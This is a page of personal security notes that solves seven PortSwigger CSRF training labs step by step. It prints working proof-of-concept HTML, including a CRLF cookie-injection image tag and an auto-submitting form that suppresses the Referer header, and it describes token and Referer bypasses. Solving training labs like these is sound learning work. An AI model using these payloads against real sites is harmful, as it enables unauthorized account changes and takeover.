sec-notes
  • Whoami
  • WEB-Pen
    • Reconnaissance
    • Enumeration
    • Cross Site Scripting
      • Cross Site Scripting
      • Exploitation
      • Protections
    • SQL Injection
      • SQL Injection Overview
    • CORS Miscofigration
    • Path Traversal
    • CSRF
    • NoSQL Injection
    • JWT Hacking
    • GraphQL Vulnerabilities
    • Link Following
    • PostMessage Vulnerabilities
      • PostMessage Vulnerabilities
      • Blocking main page to steal postmessage
      • Bypassing SOP with Iframes - part 1
      • Bypassing SOP with Iframes - part 2
      • Steal postmessage modifying iframe location
    • Checklists
      • 2FA bypass
      • admin panal
      • Authentication
      • bussiness logic
      • 403 bypass
      • idor
      • reset_password_checklist
      • mass assignment
      • aem misconfiguration
      • ATO
      • csrf
      • exif_geo
      • xss
      • Session Management
      • Authorization
      • cookie
      • Django
      • Symfony
      • json
      • bypass rate limit
      • Rce
      • Register Page
    • All Portswigger Labs solution
      • Path Traversal
      • CSRF
      • CORS
    • Incorrect Default Permissions
  • API-Pen
    • API Discovry
    • Reverse Engineering API Documentation
    • Excessive Data Exposure
    • Vulnerability Scanning
    • API Authentication Attacks
      • Classic Authentication Attacks
      • API Token Attacks
    • API Authorization Attacks
      • Broken Object Level Authorization (BOLA)
      • Broken Function Level Authorization
    • Improper Assets Management
    • Mass Assignment
    • SSRF
    • Injection Attacks in API
    • Evasive Maneuvers
  • AD-Pen
    • Active Directory Components
    • Initial Attack Vectors
      • LLMNR Poisoning
      • SMB Relay Attacks
      • IPv6 Attacks ( IPv6 DNS Takeover )
      • Printer Hacking
      • Methodology
      • Some Other Attacks
        • Zerologon (CVE-2020-1472)
        • PrintNightmare (CVE-2021-1675)
    • Post-Compromise Attacks
      • Pass Attacks
      • Kerberoasting Attack
      • Token Impersonation Attack
      • LNK File Attack
      • GPP / cPassword Attacks
      • Mimikatz
      • Methodology
    • We've Compromised the Domain
      • Dumping the NTDS.dit
      • Golden Ticket Attacks
      • Methodology
    • Case Study
  • NET-Pen
    • Attack Vectors by Port
      • FTP 21
      • SSH 22
      • Telnet 23 - 2323
      • SMTP 25
      • DNS 53
      • Kerberos 88
      • POP 110-995
      • RPC 111
      • Ident 113
      • NNTP 119
      • NetBIOS 137-138
      • SMB / Samba 135-139, 445
      • MSRPC 135
      • SNMP 161
      • LDAP 389,636
      • Modbus 502
      • OpenSSL 1337
      • Ms-SQL 1433
      • Oracle Listener 1521 1522 1529
      • NFS 2049
      • MySql 3306
      • RDP 3389
      • ADB Android Debug Bridge 5555
      • WinRM 5985 5986
      • VNC 5800 5900
      • Redis 6379
      • Unreal IRC 6667
      • Tomcat 8080
      • MongoDB 27017
      • http 80
    • Network basics
    • Information Gathering
    • Privilege Escalation
      • Windows Privilege Escalation
      • Linux Privilege Escalation
    • Password Attacks
  • write-ups
    • How i found a Privilege Escalation via Impersonation Features feature
    • How I Bypassed SAML Authentication, Leading to Admin Panel Access.
    • How I was able to discover ATO Via IDOR vulnerability
    • Easy full Account Takeover via Facebook OAuth Misconfiguration
Powered by GitBook
On this page
  • Lab: CSRF vulnerability with no defenses
  • Lab: CSRF where token validation depends on request method
  • Lab: CSRF where token validation depends on token being present
  • Lab: CSRF where token is not tied to user session
  • Lab: CSRF where token is tied to non-session cookie
  • Lab: CSRF where token is duplicated in cookie
  • Lab: CSRF where Referer validation depends on header being present
  1. WEB-Pen
  2. All Portswigger Labs solution

CSRF

PreviousPath TraversalNextCORS

Last updated 5 days ago

Lab: CSRF vulnerability with no defenses

This lab’s email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a CSRF attack to change the viewer’s email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

After logging in, click on “update email” and capture the traffic.

Without CSRF token restrictions, generate a CSRF POC (Proof of Concept) directly and copy the HTML to the exploit server.

Simply deliver the exploit to the victim.

Lab: CSRF where token validation depends on request method

This lab’s email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

You can log in to your own account using the following credentials: wiener:peter

Capture the packet after updating the email.

After modifying the CSRF token, repeat the process:

It reminds invalid csrf token.

Changing the POST method to GET was successful.

Token verification is no longer in place. Similarly, copying the payload to the exploit server is sufficient.

Lab: CSRF where token validation depends on token being present

This lab’s email change functionality is vulnerable to CSRF.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

You can log in to your own account using the following credentials: wiener:peter

Similarly, inspect the captured packets.

The CSRF token is present.

After modifying the token, attempting to change the request method is unsuccessful. Try removing the token directly:

It worked.

Lab: CSRF where token is not tied to user session

This lab’s email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren’t integrated into the site’s session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

All the methods mentioned earlier will fail.

Click “update,” capture the packet, copy the CSRF token, and then drop it.

Open a new browser, update the email again, and replace the CSRF token from the previous step.

Successful modification.

Following the steps of the first lab, generate a CSRF PoC and replace the CSRF token with an unused one.

Lab: CSRF where token is tied to non-session cookie

This lab’s email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren’t fully integrated into the site’s session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

Here are two accounts provided. After logging in, send them to repeater.

It is found that by simultaneously replacing csrfKEY and csrf, the request can be completed normally.

There is no CSRF protection in the search field.

Therefore, leveraging the search parameter, inject your personal CSRF key into the browser:

Success.

The final exploitation strategy is to replace both your CSRF key and CSRF at the victim’s end. Inject the CSRF key through injection, and CSRF through the proof of concept (POC).

The injected code is as follows:

<img src="https://0a49002f035387ea802130a40049000a.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=lklECpJ0o4k9v2iM63JurrAsOE5DpSZ6%3b%20SameSite=None" onerror="document.forms[0].submit()">

Combining with the POC, the exploitation is successful.

Lab: CSRF where token is duplicated in cookie

This lab’s email change functionality is vulnerable to CSRF. It attempts to use the insecure “double submit” CSRF prevention technique.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

Here, if the CSRF parameter exists in both the cookie and the body, modifying either one individually will result in an error. However, after experimentation, it was found that modifying both simultaneously allows for a successful request.

The following steps are similar to the previous ones.

First, inject the CSRF from the cookie into the victim’s browser using the search feature. Then, provide the victim with a matching CSRF through the POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0aac002b03978751804f446900b400e8.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="1213213&#64;11" />
      <input type="hidden" name="csrf" value="test" />
      <input type="submit" value="Submit request" />
    </form>
<img src="https://0aac002b03978751804f446900b400e8.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=test%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
  </body>
</html>

Lab: CSRF where Referer validation depends on header being present

This lab’s email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

There is no CSRF token here, but there is a restriction on the referer. If the referer is modified, it will result in an unsuccessful request:

In other words, when using the previous POC to execute an attack, it fails due to inconsistent referer.

Trying to remove the referer:

Success.

Modify the POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a1f000c0396e0bd857f3055006f0062.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="11223&#64;11" />
      <input type="submit" value="Submit request" />
   <meta name="referrer" content="no-referrer">
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Deliver the payload and finish it.